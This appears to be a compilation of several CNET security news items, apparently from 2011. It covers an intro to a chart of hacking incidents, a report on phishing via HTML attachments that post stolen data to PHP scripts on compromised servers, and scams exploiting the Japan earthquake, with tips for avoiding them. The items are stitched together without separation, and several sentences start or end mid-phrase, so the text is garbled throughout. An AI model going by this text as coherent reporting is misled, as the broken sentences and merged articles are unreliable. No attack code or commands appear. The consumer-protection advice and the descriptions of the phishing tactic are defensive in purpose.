The number of hacking events of late is making our heads spin at CNET.
By our count, there have been more than 40 computer attacks, network
intrusions, or data breaches in the last few months. And they seem to be
a daily occurrence.
In previous coverage we've noted that it seems to be open hacking season, written about some of the hackers and groups who are behind the attacks and speculated on their motives, so we thought we'd provide a chronological chart listing the attacks so we could all keep up on them. We plan to update the chart as time goes on. So please let us know if there are any additions or changes that should be made.
To get around phishing blacklists in browsers, scammers are luring
people by using HTML attachments instead of URLs, a security firm is
are good at detecting phishing sites and warning Web surfers via a
browser notice when they are about to visit a site that looks dangerous.
So good, in fact, that scammers are resorting to a new tactic to lure
victims into their traps via e-mails--attaching HTML files that are
stored locally when they are opened, according to an M86 blog post yesterday.
After the user fills in a form with the information the scammers want
to steal and clicks "submit," the HTML form sends the data through a
POST request to a PHP (Hypertext Preprocessor) script hosted on a
legitimate Web server that has been compromised. (POST is used when a
computer is sending data over the Internet to a Web server.) Because few
PHP URLs are reported as abuse, this action does not trigger a warning
from the browser, M86 said.
"Months-old phishing campaigns
remain undetected, so it seems this tactic is quite effective," the blog
post says. "Logically, however, the browser should be able to detect a
URL when the browser sends the POST request."
The phishing URLs
alone without the HTML form are hard to verify because the PHP script
runs in the server and no visible HTML is displayed after clicking the
submit button, other than redirecting to a page belonging to the company
the scammer was pretending to be, the post says.
against this, people should avoid opening HTML attachments if the e-mail
seems suspicious and not provide any information in forms. Financial
institutions do not send such attachments to customers.
many people will click on a link in an e-mail that looks like it comes
from their bank, fewer are likely to open the HTML attachment.
Mozilla representatives did not provide comment on the report today.
Meanwhile, a Google spokesperson provided this comment: "Google has a
number of defenses against phishing sites to help protect our users. For
example, Gmail checks HTML attachments for phishing sites and displays a
warning to users when one is detected. We always encourage users to be
cautious when handling unexpected attachments and when providing
personal information requested by email."
In every disaster scammers see an opportunity, and the crisis in Japan
is no exception. Already there have been fake Red Cross e-mails
circulating and there will no doubt be more scams coming.
e-mails appear to come from the British Red Cross. They provide some
news on the earthquake and tsunami in Japan and urge people to donate to
a Yahoo e-mail address on a Moneybookers account, a money transfer
service that enables recipients to remain anonymous, according to App River, an e-mail hosting and security services provider.
However, real charities have e-mail addresses with their own domain and
typically send people to their own Web site to make donations.
E-mails seeking "donations" via random payment services are just one way
scammers can exploit catastrophes. E-mails can also include links or
attachments that lead to phishing or malware-hosting Web sites. And
scammers can sneak Web sites hosting malware into Web searches based on
popular search terms and even create new topical Web sites solely for
the purpose of hosting malware.
Here are tips for avoiding scams that piggyback on disasters and other high-profile events:
• Do not follow unsolicited Web links or attachments in e-mail
messages. Be particularly cautious about clicking on photos and videos
that purport to show dramatic images or footage of disasters as they can
be used as bait and lead to malware.
• Do not provide sensitive information, such as bank account information or Social Security number, in response to an e-mail.
• Keep your antivirus and other software up to date.
• Verify the legitimacy of the e-mail by going directly to the charity's Web site or calling the group.
• Find out details about the organization by searching on the Better Business Bureau's site, or GuideStar. Attorneys general often have searchable databases of charitable groups in their states. (California's, for example, is here.) The U.S. Agency for International Development (USAID) also has valuable information about how best to help victims in international disasters.
• Be wary of sites that resemble legitimate organizations or that have
copycat names that are similar to reputable organizations. For instance,
most legitimate charitable organizations will have a Web address that
ends in ".org" instead of ".com."
• Be skeptical of people claiming to be survivors and asking for donations via e-mail or social networks.
• Ask how much of the donation goes to charity and how much goes to administration.
• Use credit cards or checks; do not send cash. Do not make checks
payable to an individual. Only provide your credit card information once
you feel certain that the organization is credible and do not use money
payment services to make contributions.
• Do not feel pressured into giving donations.
Update 11:45 a.m. PT: GFI Labs blog
is reporting on Twitter spam with a link that leads to a brand new site
purporting to sell an electronic book on how to "minimize your chances
of [getting] radiation sickness." And Sophos reports
on malware circulating that poses as links to videos about the Japanese
tsunami, as well as dangerous links sent via Twitter notifications.
Update 2:42 p.m. PT: GFI Labs blog is reporting about e-mails coming from "ICRC Basedhelping Foundation" that are seeking disaster donations. Kaspersky also is reporting
about Japan quake-related e-mails with links in them that lead to pages
with Java exploits designed to install malicious programs.
Update 4:42 p.m. PT: Sophos reported
over the weekend about a clickjacking attack in which Facebook users
were tricked into liking a YouTube video link that purported to show
video of a whale hitting a building during the tsunami in Japan.